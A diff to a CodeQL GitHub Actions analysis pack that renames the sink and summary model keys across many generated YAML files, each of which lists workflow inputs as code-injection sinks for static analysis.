diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index f8fe2344d0a3..36bdef9ad9ae 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 377e439049c8..3d66b07df9f1 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 70b2c362464e..2f8a3fbdfa6f 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index 7f317ddad8e6..e1acb54c7247 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index b1a9ea20344f..0a51c7087996 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index 37e39efd2433..0ee56c05777d 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["swagger-api/swagger-parser", "*", "input.logsPath", "code-injection", "generated"] - ["swagger-api/swagger-parser", "*", "input.parserSpecPath", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml index 9569d47329fb..f17216cf1e8c 100644 --- a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tarantool/tarantool", "*", "input.source", "code-injection", "generated"] - ["tarantool/tarantool", "*", "input.chat-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml index 6cf5dd84fbd7..551010c6634d 100644 --- a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["telepresenceio/telepresence", "*", "input.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml index ce09307f8fb4..bd64e336c171 100644 --- a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tensorflow/datasets", "*", "input.extras", "code-injection", "generated"] - ["tensorflow/datasets", "*", "input.tf-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml index 183319e32ff8..7d5454518675 100644 --- a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["texstudio-org/texstudio", "*", "input.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml index d8fb3f98b094..1ad4a2b824df 100644 --- a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine", "*", "input.extra-flags", "code-injection", "generated"] - ["toeverything/affine", "*", "input.nmHoistingLimits", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml index c0c663e69f38..60381d41f16b 100644 --- a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["treeverse/lakefs", "*", "input.compose-flags", "code-injection", "generated"] - ["treeverse/lakefs", "*", "input.compose-directory", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml index 35c0d80a115b..ac61ed797d52 100644 --- a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trezor/trezor-firmware", "*", "input.lang", "code-injection", "generated"] - ["trezor/trezor-firmware", "*", "input.model", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml index dc1dcff0b152..7eed41f755ed 100644 --- a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler", "*", "input.libsodium-version", "code-injection", "generated"] - ["tribler/tribler", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml index 2da63c894fc4..f977f6a5cce1 100644 --- a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["trunk-io/trunk-action", "*", "input.tools", "code-injection", "generated"] - ["trunk-io/trunk-action", "*", "input.post-init", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml index 3dc87b3ed761..c4bacdc9c2c7 100644 --- a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unidata/metpy", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml index 94a140a9fe17..f4ee49207979 100644 --- a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unstructured-io/unstructured", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index d8f782746230..5fae95e5defb 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index f539135bba01..4115d6c98f71 100644 
--- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index cc8a7f16492d..536b37131c17 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index ec1ed14fed50..54f72118d870 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index 18b37d3c658b..bed9ae53110e 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index c1699ec6816f..7e9f4e14e857 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 0fe9b73b6deb..3a16fc74bb68 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 27a5defa298f..686f1013dd81 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 05fd2667812b..6a6cb61c1745 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 5a91e3cd32f1..513cd4d76446 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index bb632423a1c5..2855a6d4e01d 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index dca76acdc27d..78a2cc4e0ced 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index c0e357715de3..8db73d2fc779 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 2bc23972e785..8b0deda070d9 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 740bfd26d695..3f7a7e7fda80 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index f3bfa556ee5d..9746a1186913 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index f8c4e3c68beb..6208645b1b7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 793136cc3d3a..e66e7326701e 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index e46601a7bff0..471ce3a672a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 558ff908edf1..1af30be9f358 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index a477e289d9ef..ee3d9d0a8eff 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index a72ace81445d..493594e3b81a 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index 26c0794a19c8..a437581ba83a 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 5ad39d5e184f..489e005cc0ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 3c790f81d747..3a0e723e9f70 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 50fdcfd5a2d1..893be8a27259 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 6363564503c9..75877fa48aa7 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index fce736676fea..489e6134eba4 100644 
--- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 593322a739eb..4feef931f71e 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index b3984a7ab831..189cd8bbafdc 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] 
